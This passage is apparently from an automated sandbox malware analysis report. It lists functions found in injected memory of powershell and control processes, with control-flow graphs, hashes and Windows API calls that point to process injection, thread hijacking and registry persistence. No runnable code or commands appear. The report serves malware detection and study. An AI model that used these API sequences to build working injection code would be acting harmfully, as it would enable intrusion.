                                                          • Instruction Fuzzy Hash: 55717F7061CA098FEB94EF1CD4897A677F1FBA8301F10456EE84AC7265EB34D941CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3FB948, Relevance: 2.5, APIs: 1, Instructions: 1012synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 313 2174f3fb948-2174f3fb9c3 316 2174f3fb9c5-2174f3fb9f7 call 2174f3e10cc 313->316 317 2174f3fb9f9 313->317 318 2174f3fb9fe-2174f3fba01 316->318 317->318 320 2174f3fc491-2174f3fc4ad 318->320 321 2174f3fba07-2174f3fba30 CreateMutexExA 318->321 325 2174f3fba32-2174f3fba37 321->325 326 2174f3fba4e-2174f3fba51 321->326 327 2174f3fba4b-2174f3fba4c 325->327 328 2174f3fba39-2174f3fba46 325->328 329 2174f3fc48e-2174f3fc48f 326->329 330 2174f3fba57-2174f3fba7e 326->330 327->326 328->329 329->320 333 2174f3fba84-2174f3fbad0 330->333 334 2174f3fbb47 330->334 346 2174f3fbad2-2174f3fbad9 333->346 347 2174f3fbae7-2174f3fbafb 333->347 335 2174f3fbb4c-2174f3fbb4f 334->335 335->320 337 2174f3fbb55-2174f3fbb96 335->337 340 2174f3fbb9c-2174f3fbba2 337->340 341 2174f3fbca7 337->341 343 2174f3fbba4-2174f3fbbb2 340->343 344 2174f3fbc10-2174f3fbc35 340->344 345 2174f3fbcac-2174f3fbcaf 341->345 348 2174f3fbbb4-2174f3fbbfc 343->348 357 2174f3fbc9d-2174f3fbca5 344->357 358 2174f3fbc37-2174f3fbc55 344->358 345->320 349 2174f3fbcb5-2174f3fbcd0 345->349 346->347 350 2174f3fbadb-2174f3fbae1 call 2174f3db404 346->350 353 2174f3fbb01-2174f3fbb2b 347->353 351 2174f3fbbfe-2174f3fbc02 348->351 352 2174f3fbc08-2174f3fbc0e 348->352 360 2174f3fbcd2-2174f3fbcee 349->360 361 2174f3fbd01-2174f3fbd13 349->361 350->347 351->352 352->344 352->348 364 2174f3fbb2d-2174f3fbb45 353->364 357->345 370 2174f3fbc57-2174f3fbc69 358->370 360->361 373 2174f3fbcf0-2174f3fbcf9 360->373 366 2174f3fbd15-2174f3fbd1a 361->366 367 2174f3fbd1c-2174f3fbd65 361->367 364->335 366->367 368 2174f3fbd87-2174f3fbd8c 366->368 381 2174f3fbd78-2174f3fbd79 367->381 382 2174f3fbd67-2174f3fbd70 367->382 374 2174f3fbdce-2174f3fbdd1 368->374 375 2174f3fbd8e-2174f3fbdaf 368->375 370->370 371 2174f3fbc6b-2174f3fbc9b 370->371 371->345 373->361 376 2174f3fbdd3-2174f3fbde3 call 2174f3fdb0a 374->376 377 2174f3fbde8-2174f3fbe1f 374->377 387 2174f3fbdc3-2174f3fbdcb 375->387 388 2174f3fbdb1-2174f3fbdb8 375->388 376->377 385 2174f3fbe83 377->385 386 2174f3fbe21-2174f3fbe41 377->386 391 2174f3fbd81 381->391 394 2174f3fbea6-2174f3fbeb2 382->394 395 2174f3fbd76 382->395 389 2174f3fbe88-2174f3fbe8b 385->389 401 2174f3fbe47-2174f3fbe65 call 2174f3d83bc 386->401 387->374 388->387 392 2174f3fbdba-2174f3fbdc1 388->392 389->320 393 2174f3fbe91-2174f3fbe94 389->393 391->368 392->374 397 2174f3fbe96-2174f3fbe9b call 2174f3e98fc 393->397 398 2174f3fbe9d-2174f3fbea0 393->398 399 2174f3fbeb4-2174f3fbee5 call 2174f3ddccc 394->399 400 2174f3fbf2c-2174f3fbf3e call 2174f3e3de4 394->400 395->391 397->398 398->320 398->394 399->400 410 2174f3fbee7-2174f3fbeef 399->410 413 2174f3fbf78-2174f3fbf8a call 2174f3e1164 400->413 414 2174f3fbf40-2174f3fbf71 call 2174f3ddccc 400->414 411 2174f3fbe75 401->411 412 2174f3fbe67-2174f3fbe71 401->412 410->400 415 2174f3fbef1-2174f3fbf26 call 2174f3f9700 410->415 417 2174f3fbe7a-2174f3fbe81 411->417 412->401 416 2174f3fbe73 412->416 423 2174f3fbf92-2174f3fbfde call 2174f3e2a8c call 2174f3fe4a4 call 2174f3d415c 413->423 414->423 424 2174f3fbf73-2174f3fbf74 414->424 415->400 416->417 417->389 433 2174f3fc007-2174f3fc00a call 2174f3e341c 423->433 434 2174f3fbfe0-2174f3fbfff 423->434 424->413 437 2174f3fc00f-2174f3fc014 433->437 434->433 437->320 438 2174f3fc01a-2174f3fc033 437->438 438->320 440 2174f3fc039-2174f3fc061 438->440 442 2174f3fc087-2174f3fc0b1 call 2174f3d1cc4 440->442 443 2174f3fc063-2174f3fc078 440->443 448 2174f3fc0c0-2174f3fc0d0 442->448 449 2174f3fc0b3-2174f3fc0bb 442->449 443->442 447 2174f3fc07a-2174f3fc082 443->447 447->320 450 2174f3fc23e-2174f3fc245 448->450 451 2174f3fc0d6-2174f3fc114 call 2174f3d1cc4 448->451 449->320 452 2174f3fc24b-2174f3fc26f call 2174f3e374c 450->452 453 2174f3fc3ce-2174f3fc3d7 450->453 469 2174f3fc124-2174f3fc143 451->469 470 2174f3fc116-2174f3fc11c 451->470 464 2174f3fc312-2174f3fc333 call 2174f3e374c 452->464 465 2174f3fc275-2174f3fc295 call 2174f3f353c 452->465 453->329 457 2174f3fc3dd-2174f3fc3e2 453->457 460 2174f3fc454-2174f3fc482 call 2174f3d1cc4 457->460 461 2174f3fc3e4-2174f3fc3e7 457->461 460->449 473 2174f3fc488-2174f3fc48b 460->473 466 2174f3fc3f9-2174f3fc416 461->466 467 2174f3fc3e9-2174f3fc3f3 461->467 464->453 479 2174f3fc339-2174f3fc356 call 2174f3f353c 464->479 465->464 480 2174f3fc297-2174f3fc2a4 465->480 466->460 482 2174f3fc418-2174f3fc44a 466->482 467->466 486 2174f3fc183-2174f3fc1c8 469->486 487 2174f3fc145-2174f3fc17e call 2174f3e56d0 469->487 470->469 473->329 479->453 490 2174f3fc358-2174f3fc365 479->490 484 2174f3fc300-2174f3fc30a 480->484 485 2174f3fc2a6-2174f3fc2eb call 2174f3d62ec call 2174f3f7e04 480->485 482->460 484->464 485->484 509 2174f3fc2ed-2174f3fc2fb call 2174f3fd734 485->509 493 2174f3fc1ca-2174f3fc1e7 call 2174f3d1cc4 486->493 494 2174f3fc20b-2174f3fc211 486->494 487->486 495 2174f3fc367-2174f3fc3ae call 2174f3d62ec call 2174f3f7e04 490->495 496 2174f3fc3bc-2174f3fc3c6 490->496 504 2174f3fc1e9-2174f3fc1ee 493->504 505 2174f3fc1f0-2174f3fc209 493->505 506 2174f3fc213-2174f3fc216 494->506 495->496 519 2174f3fc3b0-2174f3fc3b7 call 2174f3dd9f4 495->519 496->453 504->506 505->506 506->320 510 2174f3fc21c-2174f3fc227 506->510 509->484 510->453 515 2174f3fc22d-2174f3fc239 call 2174f3f2754 510->515 515->453 519->496
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$MutexQueueThreadUser
                                                          • String ID:
                                                          • API String ID: 1097034428-0
                                                          • Opcode ID: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction ID: 6f797e3d4e9062a2cd2301aa0854f2e53238cf7e668eb094ec54bff764b02a0b
                                                          • Opcode Fuzzy Hash: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction Fuzzy Hash: 7872857161CA488FEB58EF68EC896A977F1F7A8700F10452ED44BC32A1DE34D945CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3FB230, Relevance: 1.8, APIs: 1, Instructions: 286memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          • Opcode ID: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction ID: 592b41a0d8b8b953e5ef6db01a3161e8f27817cec4e5e291d1fededfae86c6e0
                                                          • Opcode Fuzzy Hash: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction Fuzzy Hash: 1491837061CB498FEB58EF2CD8497AA33F5FBE4315F14456AD44AC32A1EE78D8018B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3EE860, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 655 2174f3ee860-2174f3ee88e NtQueryInformationProcess 656 2174f3ee890-2174f3ee898 655->656 657 2174f3ee8bb-2174f3ee8c8 655->657 656->657 658 2174f3ee89a-2174f3ee8a5 656->658 659 2174f3ee8b6-2174f3ee8b9 658->659 659->657 660 2174f3ee8a7-2174f3ee8af 659->660 660->657 661 2174f3ee8b1-2174f3ee8b4 660->661 661->659
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction ID: a4cfcb4775e6a41beb9f06f150db369d2065f58708021514fc05fdc3587e4488
                                                          • Opcode Fuzzy Hash: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction Fuzzy Hash: 77014B30218A098FEB94EF6CD8C8BA573F5FBE8705F51056EA41AC71A4E728D881CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3E8B90, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction ID: bd16dfacf422c9013890673db0dbbee5032dfee46da9d6cc651ddda1fb71c3cd
                                                          • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction Fuzzy Hash: 1701D6B0A08B048FCB48DF69D0C8569BBE1FB58311F10066FE949C7796DB70D885CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3E1950, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
                                                          • Instruction ID: 88b0eed7a5b1beeab9697fa470a6fb554649f90174812bd2a08006dbcd98b034
                                                          • Opcode Fuzzy Hash: 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
                                                          • Instruction Fuzzy Hash: 0DE09274B18A458FE7006BB8C8CC3B873F0FB98305F500839F885C73A0C629C8404282
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3E2A8C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateValue
                                                          • String ID: ($(
                                                          • API String ID: 2259555733-222463766
                                                          • Opcode ID: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction ID: 42df46906e255fa3863b1b74c1ef916dafc701ed99d0ee8f59b5a9c86a58e1de
                                                          • Opcode Fuzzy Hash: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction Fuzzy Hash: 6A316C3061CA088FE764EF18E8597A6B7F5FBA8305F50052DE84AC32A1DB789946CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3F99D0, Relevance: 4.6, APIs: 3, Instructions: 146fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 209 2174f3f99d0-2174f3f99fa call 2174f3e4050 212 2174f3f9b12-2174f3f9b29 209->212 213 2174f3f9a00-2174f3f9a17 call 2174f3ea140 209->213 216 2174f3f9afe-2174f3f9b0a 213->216 217 2174f3f9a1d-2174f3f9a3a 213->217 216->212 218 2174f3f9a3c-2174f3f9a56 217->218 219 2174f3f9a58-2174f3f9a69 217->219 218->219 220 2174f3f9a6a-2174f3f9a75 218->220 219->220 220->216 221 2174f3f9a7b-2174f3f9aae CreateFileA 220->221 221->216 222 2174f3f9ab0-2174f3f9ac3 SetFilePointer 221->222 223 2174f3f9af5-2174f3f9af6 222->223 224 2174f3f9ac5-2174f3f9ae5 ReadFile 222->224 223->216 224->223 225 2174f3f9ae7-2174f3f9aec 224->225 225->223 226 2174f3f9aee-2174f3f9af3 225->226 226->223
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreatePointerRead
                                                          • String ID:
                                                          • API String ID: 2103328899-0
                                                          • Opcode ID: 71d59c8fd03c1f47d27e273b6030a364b82ed69c839053eddebff289bcd6d591
                                                          • Instruction ID: 835b54217e913c08985fbd09c7840536894df8d16d99dae7d99de2e28da6df75
                                                          • Opcode Fuzzy Hash: 71d59c8fd03c1f47d27e273b6030a364b82ed69c839053eddebff289bcd6d591
                                                          • Instruction Fuzzy Hash: 9C41A23021CA084FDB58DF2CDCC866977F1FB98318F25866DD19AC72A2DA79D8428791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3E80D4, Relevance: 3.2, APIs: 2, Instructions: 237threadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Thread$ResumeSuspend
                                                          • String ID:
                                                          • API String ID: 3472746266-0
                                                          • Opcode ID: ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
                                                          • Instruction ID: 22024c34e128909b300d30a710de138f9f6c0c257b4dc63240da1819d691180d
                                                          • Opcode Fuzzy Hash: ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
                                                          • Instruction Fuzzy Hash: B471313061CA484BEB98EB1CE8497EA73F5FBE8305F50452DE58AC3291DE34D945CB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3D1CC4, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 306 2174f3d1cc4-2174f3d1d00 CreateThread 307 2174f3d1d02-2174f3d1d13 QueueUserAPC 306->307 308 2174f3d1d3b-2174f3d1d4d 306->308 307->308 309 2174f3d1d15-2174f3d1d33 307->309 309->308
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateQueueThreadUser
                                                          • String ID:
                                                          • API String ID: 3600083758-0
                                                          • Opcode ID: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                          • Instruction ID: b2c49f9e2415e5d778a26ae5fe5cf4013d4eeb17b3d9b3065595d8a058f232a0
                                                          • Opcode Fuzzy Hash: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                          • Instruction Fuzzy Hash: D5012930718A094FEBA4EF6D984D63976F2EBA8351B24457AA419C3270DF78DC428B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3DA4DC, Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ContinueHandlerVectored
                                                          • String ID:
                                                          • API String ID: 3758255415-0
                                                          • Opcode ID: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                          • Instruction ID: 5822ac98c732554e4598e61431cd52c24f5623b6090a11f0085ebb9e0613ac76
                                                          • Opcode Fuzzy Hash: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                          • Instruction Fuzzy Hash: AE51983160CA0A8FFF65EF2895583BA77F2EBE8351F14453E9456C32A1DE78C5468B02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3F6508, Relevance: 1.6, APIs: 1, Instructions: 101registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 616 2174f3f6508-2174f3f6559 618 2174f3f6561-2174f3f6579 616->618 619 2174f3f655b-2174f3f655f 616->619 622 2174f3f65b2-2174f3f65d9 RegQueryValueExA 618->622 623 2174f3f657b 618->623 620 2174f3f6595-2174f3f65b1 619->620 624 2174f3f657e-2174f3f6581 622->624 625 2174f3f65db-2174f3f65e5 622->625 623->624 624->620 626 2174f3f6583-2174f3f658d 624->626 625->620 626->620
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID:
                                                          • API String ID: 3660427363-0
                                                          • Opcode ID: 1f6ad6994c92080283db70fc4a04c579610f830166e95bdc93f203490e1fbcbe
                                                          • Instruction ID: 2e1a8d12cff1d92a0e6e35d7a6170c76fb5d7baf153bb6d0250d90f775090af6
                                                          • Opcode Fuzzy Hash: 1f6ad6994c92080283db70fc4a04c579610f830166e95bdc93f203490e1fbcbe
                                                          • Instruction Fuzzy Hash: 7B319C3060CB088FEB58EF18D4896A6B3E0FBA8301F11452EE84EC7255DB34E8408B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3FE4A4, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateValue
                                                          • String ID:
                                                          • API String ID: 2259555733-0
                                                          • Opcode ID: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
                                                          • Instruction ID: e28f92274439f2333f853763aacf18633fc3a7bbf6bf8cce19df32c8e683b562
                                                          • Opcode Fuzzy Hash: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
                                                          • Instruction Fuzzy Hash: 7221E37061C74C8FE784EF68D458B9AB7F1FBE8345F400929A48AC3251EB74D540CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3E374C, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 644 2174f3e374c-2174f3e376d 645 2174f3e376f-2174f3e377a RegCreateKeyA 644->645 646 2174f3e377c-2174f3e3782 644->646 647 2174f3e3787-2174f3e378d 645->647 646->647 649 2174f3e378f-2174f3e37c2 call 2174f3e36b0 647->649 650 2174f3e37cc-2174f3e37de 647->650 649->650 654 2174f3e37c4-2174f3e37ca 649->654 654->650
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                          • Instruction ID: 99058cac7fef9eae682e9ad92b594ba0fa9aea1048e5cb602531b48d490d1ab0
                                                          • Opcode Fuzzy Hash: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                          • Instruction Fuzzy Hash: 4711613061CA198FEB54DB5CD48876ABBF5EBEC341F14052EE88DC32A0DA74C9458742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Analysis Process: control.exe PID: 2896 Parent PID: 6072 control.exeCOMMON

                                                          Executed Functions

                                                          Function 000CE95C, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 643COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 21 ce95c-ce9b8 22 ce9cf-ce9d7 21->22 23 ce9ba-ce9cd 21->23 24 ce9dc-ce9e4 22->24 23->24 25 ce9ee-ce9f3 24->25 26 ce9e6-ce9e9 24->26 27 cea38-cea42 25->27 28 ce9f5-cea12 25->28 29 cefee-cf00a 26->29 30 cef6e 27->30 31 cea48-cea58 27->31 35 cea1c-cea36 call bdf20 28->35 36 cea14-cea17 28->36 33 cef73-cef76 30->33 31->30 34 cea5e-cea68 31->34 37 cef78-cef82 NtUnmapViewOfSection 33->37 38 cef87-cef8a 33->38 39 cea6e-cea72 34->39 40 cec95-cec98 34->40 35->27 43 cefc5-cefcd 36->43 37->38 45 cef8c-cef97 38->45 46 cefc0-cefc1 38->46 41 cec9e-ceca3 39->41 42 cea78-ceab3 call c5b80 39->42 40->41 40->42 41->43 57 ceab9-ceaef call c8b90 42->57 58 cef67-cef6c 42->58 43->29 47 cefcf-cefe6 call c10cc 43->47 49 cef99-cef9b 45->49 50 cefa2-cefa9 NtClose 45->50 46->43 47->29 49->50 53 cef9d-cefa0 49->53 56 cefae-cefb8 50->56 53->46 56->46 57->33 61 ceaf5-ceb09 call c6e1c 57->61 58->33 61->33 64 ceb0f-ceb12 61->64 65 ceb14-ceb1e call ddb0a 64->65 66 ceb23-ceb28 64->66 65->66 68 ceb2a-ceb30 66->68 69 ceb53-ceb79 call ddb0a 66->69 68->69 70 ceb32-ceb33 68->70 74 ceb8c-ceb90 69->74 75 ceb7b-ceb89 69->75 72 ceb36-ceb51 70->72 72->69 72->72 76 ceba9-cebb6 74->76 77 ceb92-ceba6 74->77 75->74 78 cebbc-cebe6 76->78 79 ceca8-cecaf 76->79 77->76 80 cebfe-cec21 call d4ba0 78->80 81 cebe8-cebef 78->81 82 cecc7-cecec 79->82 83 cecb1-cecb8 79->83 92 ced78-ced7a 80->92 93 cec27-cec4e call d4ba0 80->93 81->80 84 cebf1-cebf8 81->84 82->92 94 cecf2-ced16 call d99d0 82->94 83->82 85 cecba-cecc1 83->85 84->80 87 cec83-cec90 84->87 85->82 88 ced66-ced6a 85->88 91 ced70-ced73 call ddb0a 87->91 88->91 91->92 92->33 96 ced80-cedc4 call ddb0a 92->96 93->92 103 cec54-cec7b call d4ba0 93->103 94->92 104 ced18-ced3c call d99d0 94->104 110 cef4c-cef4e 96->110 111 cedca-cee0f call c10cc * 2 96->111 103->92 112 cec81 103->112 104->92 113 ced3e-ced62 call d99d0 104->113 110->33 114 cef50-cef5b 110->114 123 cef1b-cef22 111->123 124 cee15-cee42 call bfca8 111->124 112->87 113->92 120 ced64 113->120 114->33 118 cef5d-cef65 114->118 118->33 120->88 130 cef2b 123->130 131 cef24-cef29 123->131 128 cee48-cee55 124->128 129 cef32-cef38 124->129 132 cee6d-cee6f 128->132 133 cee57-cee6b 128->133 134 cef3a-cef44 129->134 135 cef2d-cef30 130->135 131->134 132->135 136 cee75-ceeca call ddb0a 132->136 133->132 134->110 135->129 135->134 142 ceecc-ceed1 136->142 143 ceed4-ceef2 call c1950 136->143 142->143 143->134 146 ceef4-cef01 143->146 146->135 147 cef03-cef0f NtSetContextThread 146->147 148 cef17-cef19 147->148 148->135
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                          • Instruction ID: 1c6296f2d7a291b06cc6a180511e1df46bcaf58469597c892d3e8f101a42d2f8
                                                          • Opcode Fuzzy Hash: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                          • Instruction Fuzzy Hash: A6124330718E498FDBA9EF28D895BAA73E1FB58301F40452EE44AC3255DF34E9458B85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000D20A4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 149 d20a4-d2113 call c10cc 153 d21ec-d21f5 149->153 154 d2119-d2134 149->154 156 d21de-d21df 154->156 157 d213a-d217b NtQueryInformationToken 154->157 156->153 159 d217d-d21a8 NtQueryInformationToken 157->159 160 d21d0-d21d8 NtClose 157->160 161 d21be-d21c8 159->161 162 d21aa-d21b9 call ddb0a 159->162 160->156 161->160 162->161
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationQueryToken$Close
                                                          • String ID: 0
                                                          • API String ID: 459398573-4108050209
                                                          • Opcode ID: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                          • Instruction ID: 8e6d536ea4e02b18a4c9fc035cab7e167f1465354542ef92c80d09b45fa7bfa5
                                                          • Opcode Fuzzy Hash: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                          • Instruction Fuzzy Hash: 3B311934218B898FD764EF19D884BAAB7E2FB98301F50493EE48AC3255CB349945CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000DA8F0, Relevance: 6.2, APIs: 4, Instructions: 197nativethreadinjectionCOMMON
